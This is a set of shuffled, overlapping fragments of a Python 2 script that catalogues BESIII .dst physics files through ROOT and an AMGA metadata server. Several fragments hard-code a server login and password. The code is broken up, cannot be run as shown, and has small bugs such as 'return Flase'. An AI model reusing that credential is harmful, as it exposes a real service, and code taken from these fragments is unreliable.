"of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return",
"resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be",
"createBesDir first\" return Flase for item in entries: #for each entry,get its attributes",
"of streamId is null #null <=> value of Description is null attributes[\"status\"] =",
"in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename",
"import re import time #get number behiend string \"exp\" def getNum(expNum): format =",
"string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm and runto",
"EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\")",
"changeFormat #function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag",
"resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes = {}",
"entry in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare",
"is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according",
"%d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is",
"res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries =",
"of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null'",
"result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL =",
"is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL = runH =",
"a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2",
"need to use changeFormat #function to create a .root link for .dst file",
"lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return",
"False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format",
"#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0]",
"os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like",
"use changeFormat #function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]):",
"if list is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split",
"ExpSearch according runids def getExpRes(runids): entries = [] expRes = {} expNumList =",
"each entry if eventType == result[0]: return True return False #judge format of",
"return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has",
"i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry",
"runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if",
"= {} runIds = [] #change the .dst file to .root file rootfile",
"num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get",
"their style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"]",
"mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str =",
"str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None:",
"expNumList #add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance",
"0 #print \"file\",file for format in srcformat: #if format of file is in",
"null #-1 <=> value of streamId is null #null <=> value of Description",
"run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule, #file name",
"<=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"]",
"in srcformat if file.endswith(format): flag = 1 return flag #Before reading information from",
"length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn",
"else: print \"Error %s:in the filename,runL = runH = %d,but runId in the",
"#!/usr/bin/env python # -*- coding:utf-8 -*- # author: linlei #for data/all name of",
"in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] =",
"items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get",
"#compare runid of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"])",
"attribute status #-1 <=> value of status is null attributes[\"status\"] = -1 del",
"expRes #check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries",
"result = client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto",
"%s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from",
"= lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True:",
"like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in items",
"#get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum)",
"== \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] =",
"including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including",
"== True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is",
"attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"])",
"rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values",
"\",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag =",
"getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return",
"expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine",
"string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList",
"if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile",
"= string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {}",
"is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them from",
"for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] =",
"runid whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if",
"\"error\" #set values of attribute status,streamId,Description #and these values are null #-1 <=>",
"= str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether",
"#lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\")",
"result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in",
"bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def",
"this id isn't in resonance List,add it to resList if result[4] not in",
"expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum",
"information from .root file,we need to use changeFormat #function to create a .root",
"srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file",
"JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile",
"item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result =",
"directory is empty, please run createBesDir first\" return Flase for item in entries:",
"\"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"]",
"evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error",
"print \"ExpSearch directory is empty, please run createBesDir first\" return Flase for item",
"getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling getLFN function",
"expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList)",
"runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this",
"attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes =",
"resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0]",
"entry = client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE'])",
"get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"]",
"run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type",
"file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return",
"is same as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"]",
"size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def",
"+ \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is",
"getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"])",
"expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str",
"= items[0] result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] =",
"filesize by calling getFileSize function #get name by calling getLFN function attributes[\"fileSize\"] =",
"attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time",
"is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\":",
"TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i",
"if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has",
"getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"]",
"file,we need to use changeFormat #function to create a .root link for .dst",
"= res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list",
"runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat",
"gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1",
"= [] expRes = {} expNumList = [] resList = [] #print\"runids\",runids client",
"only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also",
"data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new",
"entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with",
"= expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else:",
"expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance that",
"return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn",
"def __str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat is",
"runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] =",
"return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename",
"of attribute status,streamId,Description #and these values are null #-1 <=> value of status",
"runId in filename also is equal to runId in rootfile if attributes[\"runId\"] ==",
"from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance",
"ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile):",
"for item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result",
"delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return",
"entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch directory is empty,",
"raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile)",
"= changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\"",
"its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print",
"= time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end",
"#if resonance in filename is same as resonance that get from ExpSearch if",
"if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and",
"author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc,",
"runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"]",
"client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1])",
"\"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists",
"else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\"",
"print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else:",
"in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return",
"= -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return",
"by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH",
"is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and",
"obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time()",
"and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in",
"result = {} items = lfn.split(\"_\") if type == \"all\": if items[2] ==",
"\"error\" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn",
"splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\": if items[2]",
"print \"Error %s:in the filename,runL = runH = %d,but runId in the root",
"str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str +",
"dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes",
"attributes[\"eventType\"] = \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of",
"Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del",
"return \"error\" else: print \"Error %s:in the filename,runL = runH = %d,but runId",
"= lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid) expRes",
"getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo",
"expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to resList if",
"like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format)",
"in items is string,we need to change their style to integer for i",
"\"error\" else: #this dst file has several runIds,get them from JobOptions by calling",
"into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str",
"as resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"]",
"#set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile",
"\"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set",
"return res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries",
"stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')",
"status,streamId,Description #and these values are null #-1 <=> value of status is null",
"res = format.search(expNum) if res is not None: return res.group() #Get expNum and",
"new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def",
"pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is not None: #get",
"file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the",
"jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in",
"import string import re import time #get number behiend string \"exp\" def getNum(expNum):",
"item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in",
"client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is",
"raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split",
"TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get",
"attributes = {} expRes = {} runIds = [] #change the .dst file",
"else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\"",
"runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"]",
"of this id isn't in resonance List,add it to resList if result[4] not",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"]",
"this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile",
"return flag #Before reading information from .root file,we need to use changeFormat #function",
"return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile",
"import os import os.path import ROOT from ROOT import gROOT from amga import",
"ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string import re",
"\"Error %s:in the filename,runL = runH = %d,but runId in the root file",
"import time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res",
"List,add it to resList if result[4] not in resList: resList.append(result[4]) #only including one",
"expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False:",
"expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"]",
"getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling getLFN function",
"expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print",
"function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType",
"all attributes attributes = {} expRes = {} lfnInfo = {} runIds =",
"runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling",
"filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds)",
"import os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import",
"1 return flag #Before reading information from .root file,we need to use changeFormat",
"list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is string,we need",
"if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL",
"in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL",
"def getAttributes(self): #store all attributes attributes = {} expRes = {} runIds =",
"format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self):",
"by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile",
"size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0:",
"rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and",
"expRes == False: print \"Can't get expNum and resonance of this file\" return",
"is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2",
"a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0:",
"#Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries = []",
"= \"all\" #get runId from filename runId = splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile",
"\"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] =",
"result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1:",
"commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] =",
"runIds according ',' items=runIds.split(',') #members' style in items is string,we need to change",
"filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description",
"items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return",
"expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] =",
"str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if",
"\"m\" + expNumList[0] for expNum in expNumList[1:]: str = str + \"p+\" +",
"lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to runId in",
"runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid",
"= format def __str__(self): return repr(\"the File's format is not \",self.format) #type of",
"expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong to this",
"return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList =",
"is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename",
"# print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids:",
"by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile)",
"attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"]",
"== lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get",
"is null #-1 <=> value of streamId is null #null <=> value of",
"%d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values are null",
"eventType == result[0]: return True return False #judge format of file class JudgeFormat(Exception):",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] =",
"string import re import time #get number behiend string \"exp\" def getNum(expNum): format",
"expRes = {} expNumList = [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')",
"== lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in",
"file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT",
"format of file is in srcformat if file.endswith(format): flag = 1 return flag",
"#create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return",
"JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr(\"the File's format",
"attributes attributes = {} expRes = {} runIds = [] #change the .dst",
"#for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use",
"[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's",
"print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\"",
"filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists",
"\"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return",
"it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile",
"style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] =",
"for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1]",
"else: #has several resonances,may be has something wrong to this file print \"serveral",
"#get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes ==",
"if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in expNumList",
"id isn't in resonance List,add it to resList if result[4] not in resList:",
"\"Content of this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get",
"-1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj",
"flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if",
"del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst",
"\"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes #check whether eventType is stored",
"#store all attributes attributes = {} expRes = {} lfnInfo = {} runIds",
"in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] = lfnInfo[\"eventType\"] else:",
"if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start",
"splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has one runId if",
"of attribute status #-1 <=> value of status is null attributes[\"status\"] = -1",
"res is not None: return res.group() #Get expNum and resonance from ExpSearch according",
"commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch*",
"#check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"] =",
